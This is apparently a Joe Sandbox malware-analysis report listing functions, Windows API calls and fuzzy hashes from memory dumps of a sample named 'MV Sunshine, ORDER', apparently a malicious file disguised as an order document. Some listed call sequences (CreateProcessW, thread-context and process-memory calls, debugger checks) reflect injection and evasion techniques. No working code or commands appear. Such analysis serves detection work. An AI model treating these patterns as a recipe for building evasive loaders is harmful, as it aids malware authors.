Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 583e2ce53b9c134c0a0122a2e6cab01edf27db69d7ddd300bff76397c6ec1876
Instruction ID: 0b4d507ab71c7a3ed34138b0a507e7582698f535ada7e3174b19e69e865ce38c
Opcode Fuzzy Hash: 583e2ce53b9c134c0a0122a2e6cab01edf27db69d7ddd300bff76397c6ec1876
Instruction Fuzzy Hash: 58418D32A04259ABDF21BF64D8517BE7FA6AF85300F684475FC829B383D6358D4483E2

Function 0098492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00984992

Part of subcall function 009A35AC: __lock.LIBCMT ref: 009A35B2
Part of subcall function 009A35AC: DecodePointer.KERNEL32(00000001,?,009849A7,009D81BC), ref: 009A35BE
Part of subcall function 009A35AC: EncodePointer.KERNEL32(?,?,009849A7,009D81BC), ref: 009A35C9

Part of subcall function 00984A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00984A73
Part of subcall function 00984A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00984A88

Part of subcall function 00983B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B7A
Part of subcall function 00983B4C: IsDebuggerPresent.KERNEL32 ref: 00983B8C
Part of subcall function 00983B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A462F8,00A462E0,?,?), ref: 00983BFD
Part of subcall function 00983B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00983C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 009849D2

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: a91b6341f9f28702e5b17b6abe93ad5383e921213be67f98ff78ff41de51c6de
Instruction ID: 7f1e4f12638084548f4d69a153136b51966530f0d8b4507d1887970d30255779
Opcode Fuzzy Hash: a91b6341f9f28702e5b17b6abe93ad5383e921213be67f98ff78ff41de51c6de
Instruction Fuzzy Hash: 6E1190B9918311AFC310EFA8DC45A5AFBE8EFD6750F00851EF04587271DBB19946CB92

Function 009A0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009A594C: __FF_MSGBANNER.LIBCMT ref: 009A5963
Part of subcall function 009A594C: __NMSG_WRITE.LIBCMT ref: 009A596A
Part of subcall function 009A594C: RtlAllocateHeap.NTDLL(015A0000,00000000,00000001,00000000,?,?,?,009A1013,?), ref: 009A598F

std::exception::exception.LIBCMT ref: 009A102C
__CxxThrowException@8.LIBCMT ref: 009A1041

Part of subcall function 009A87DB: RaiseException.KERNEL32(?,?,?,00A3BAF8,00000000,?,?,?,?,009A1046,?,00A3BAF8,?,00000001), ref: 009A8830

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: bab3e451c2aa18e3da7429358edca49c9e26c0fa421ab93f513f7d9add41a661
Instruction ID: 11d1c5d494484abf7fd96ea8247066d125f359ab21bdf7bfe756c92488e4c820
Opcode Fuzzy Hash: bab3e451c2aa18e3da7429358edca49c9e26c0fa421ab93f513f7d9add41a661
Instruction Fuzzy Hash: D3F0C83554021DA7CB21BA58EC05BDF77ADAF43350F100426F804A6591EFB1CAD096E0

Function 009A582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 009A585C
__lock_file.LIBCMT ref: 009A587D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: f60b3aefe788a38a1490ada899f9e131bcc684a9177d04cae5c0ddb8bf4ade24
Instruction ID: 70c260b45996a6f2116eb577c4ce7b64c549705f2f4ab7b67ddba0857c07931a
Opcode Fuzzy Hash: f60b3aefe788a38a1490ada899f9e131bcc684a9177d04cae5c0ddb8bf4ade24
Instruction Fuzzy Hash: 1A018471D00609EBCF22EF698C0569F7B65AFC2760F158215F8145A1A1DB358A21DBD1

Function 009A55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68

__lock_file.LIBCMT ref: 009A561B

Part of subcall function 009A6E4E: __lock.LIBCMT ref: 009A6E71

__fclose_nolock.LIBCMT ref: 009A5626

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 3458fa5619b2aa485304f37c0ea7bfa0546dd06a71f30c822de8ad1c30abdb79
Instruction ID: e261e02e7a81c98c78f8fc56fde7bf860651cbb294410825ecefc34d13f8221f
Opcode Fuzzy Hash: 3458fa5619b2aa485304f37c0ea7bfa0546dd06a71f30c822de8ad1c30abdb79
Instruction Fuzzy Hash: F2F0B471A00A059BD720AF75880276F77A16F83334F668209F414AB1C1CF7C89019BD5

Function 0222129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 02221A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02221AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02221B13

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: 4500e46207a492d130920dd042d49b9280702f2c1823973f68cbda5179ca2e3b
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: 5312EE24E24658C6EB24DF60D8507DEB232EF68300F1090E9910DEB7A5E77A4F95CF5A

Function 0098766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0098774A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 270eceb12a96a73d3ff24fe8e99f789d393aac14128276be90c1ddf2aac185e9
Instruction ID: c6734c64da4e292a3ee836439c5ab3f1e34eb077fb7c13c2ea377b96aa03ce09
Opcode Fuzzy Hash: 270eceb12a96a73d3ff24fe8e99f789d393aac14128276be90c1ddf2aac185e9
Instruction Fuzzy Hash: DE31B279208A02DFC724AF58C490A21F7A4FF49310B24C56DE98ACB765E730EC81DB95

Function 009C00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 009C00E1

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8c008afa125a47722abb3de1f13ebffffdf5649cdc3e830417d4fb8f1fe5bf92
Instruction ID: b0b608f39b5916d44382273824ab726c49d0a0eee1330458684e0a3d0627261d
Opcode Fuzzy Hash: 8c008afa125a47722abb3de1f13ebffffdf5649cdc3e830417d4fb8f1fe5bf92
Instruction Fuzzy Hash: BD410774908351CFDB24DF14C484B1ABBE4BF85318F19899DE8998B762C376E845CB52

Function 00984F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00984D13: FreeLibrary.KERNEL32(00000000,?), ref: 00984D4D

Part of subcall function 009A548B: __wfsopen.LIBCMT ref: 009A5496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984F6F

Part of subcall function 00984CC8: FreeLibrary.KERNEL32(00000000), ref: 00984D02

Part of subcall function 00984DD0: _memmove.LIBCMT ref: 00984E1A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 8ac513056c3ef2575554c99906de75eb8caf6964b71f0f9e6e44ca3940f75cde
Instruction ID: bd001cd51ed6179766785e84359d278d3a159659c2e78a393b3ba0f423936e95
Opcode Fuzzy Hash: 8ac513056c3ef2575554c99906de75eb8caf6964b71f0f9e6e44ca3940f75cde
Instruction Fuzzy Hash: A8110A3160030AABCB10FF74DC12FAE77A99FC4710F10882DF581A73C1DA759A059B90

Function 009C01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 009C01BB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5fe2e0420270829f1128712643c1660e7f70c38f384b48b11377b431853e77a6
Instruction ID: d3010b65ec57bfbe6049486bc547fa7cd68955f6527f92b185a9f9ae1d3aa9de
Opcode Fuzzy Hash: 5fe2e0420270829f1128712643c1660e7f70c38f384b48b11377b431853e77a6
Instruction Fuzzy Hash: A92142B4908341CFDB24EF54C484B1ABBE4BF89304F09896CE89A57762D731E845CB93

Function 00987F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00987F82

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 655c4edcc936791763e04923be4c22679df8ae5058c891d1c595f59b22235dd7
Instruction ID: 51eb46c8acccc539311c9e081ecc7a07071c66d12dc9c9c45e367ed022754b86
Opcode Fuzzy Hash: 655c4edcc936791763e04923be4c22679df8ae5058c891d1c595f59b22235dd7
Instruction Fuzzy Hash: 8001F9722047017ED3206F79CC02F67FB98EB85760F20852EF65ACA2D1EA31E4408790

Function 009A4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 009A4AD6

Part of subcall function 009A8D68: __getptd_noexit.LIBCMT ref: 009A8D68

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 33bc1e485a65d4c0c8cc3682334d0804827489e61d13381ae191e00cb405c802
Instruction ID: eca2aa9b692a7c2bd9f6307ec0e1af34748be39dd8ab553977d80fa87c80f93b
Opcode Fuzzy Hash: 33bc1e485a65d4c0c8cc3682334d0804827489e61d13381ae191e00cb405c802
Instruction Fuzzy Hash: 34F0C831940209ABDF51AFB4CC063DF7665AFC2325F144514F414AA1D1CBB88961DFD5

Function 00984FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00A462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984FDE

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 136bf52214d3dd9c4b2080a28a83a7eae3c2cf0f3927a9f08a123e6241dd8e37
Instruction ID: 63ebbc5316b8b5935140e401606ec976e8fee2ef4f419462e7753b9b06e484d6
Opcode Fuzzy Hash: 136bf52214d3dd9c4b2080a28a83a7eae3c2cf0f3927a9f08a123e6241dd8e37
Instruction Fuzzy Hash: 98F03971505722CFCB34AF64E894912BBE5BF153293208A3EE2D682B10C735A840DF40

Function 009A09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009A09F4

Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 762fff13619c7c2eaa5b349211359942c6cd9ee8f82ef36d5bd6b48c1eb64919
Instruction ID: 6eaf88aab68bff0f11098e7341e65bbe15418c342813aa66ac9612c9f7735124
Opcode Fuzzy Hash: 762fff13619c7c2eaa5b349211359942c6cd9ee8f82ef36d5bd6b48c1eb64919
Instruction Fuzzy Hash: 18E086369042285BC720E6989C05FFAB7ADDFC87A0F0401B5FC0CD7249E960AC828690

Function 009E9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 009E914B

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 0be545ccb71d8d7643a6858f83bf0cd491238845ad8d62f3ab9a035438f58c8e
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: 75E092B0208B405FD7358A24D8107E373E4BB06315F00081CF29AC3342EB62BC418759

Function 009A548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 009A5496

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 41c3f020c868966108b2cb9befa323a9ae4b6808c6cf0eade0b653b4293c2966
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: E6B0927694020C7BDE012E82EC02B593F599B85678F808020FB0C18172A673A6A096C9

Function 009A0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 009A0EF7

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 2bcec30cdea35d52332ec49d890e4a0a6bbd0184ad3be6049ff244afb267e829
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 5031E370A00105DFCB18DF58D480969F7AAFF9A300B788AA5E40ADB651EB31EDC1DBC0

Function 0222229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 022222B1

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 03b42c0e2dc75e39f090e68b58a6525c3bfa82716fde3c91d6a4b497ffa9db19
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 81E0BF7494010EEFDB00EFE4D9496DE7BB4EF04311F1006A1FD05D7690DB719E548A62

Function 022222A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 022222B1

Memory Dump Source

Source File: 00000000.00000002.1692712668.0000000002220000.00000040.00001000.00020000.00000000.sdmp, Offset: 02220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2220000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 441ce1807c50e73dab1eb1e8b6e40130c233ccd1c1bbaf77fc3984557789007e
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 62E0E67494010EEFDB00EFF4D94969E7FB4EF04301F100261FD01D2280D6719D508A72

Non-executed Functions

Function 00A0CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A0CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00A0CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0CF00
SendMessageW.USER32 ref: 00A0CF29
_wcsncpy.LIBCMT ref: 00A0CFA1
GetKeyState.USER32(00000011), ref: 00A0CFC2
GetKeyState.USER32(00000009), ref: 00A0CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A0CFE5
GetKeyState.USER32(00000010), ref: 00A0CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A0D018
SendMessageW.USER32 ref: 00A0D03F
SendMessageW.USER32(?,00001030,?,00A0B602), ref: 00A0D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A0D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A0D16E
SetCapture.USER32(?), ref: 00A0D177
ClientToScreen.USER32(?,?), ref: 00A0D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A0D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A0D203
ReleaseCapture.USER32 ref: 00A0D20E
GetCursorPos.USER32(?), ref: 00A0D248
ScreenToClient.USER32(?,?), ref: 00A0D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0D2B1
SendMessageW.USER32 ref: 00A0D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00A0D31C
SendMessageW.USER32 ref: 00A0D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A0D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A0D37B
GetCursorPos.USER32(?), ref: 00A0D39B
ScreenToClient.USER32(?,?), ref: 00A0D3A8
GetParent.USER32(?), ref: 00A0D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00A0D431
SendMessageW.USER32 ref: 00A0D462
ClientToScreen.USER32(?,?), ref: 00A0D4C0
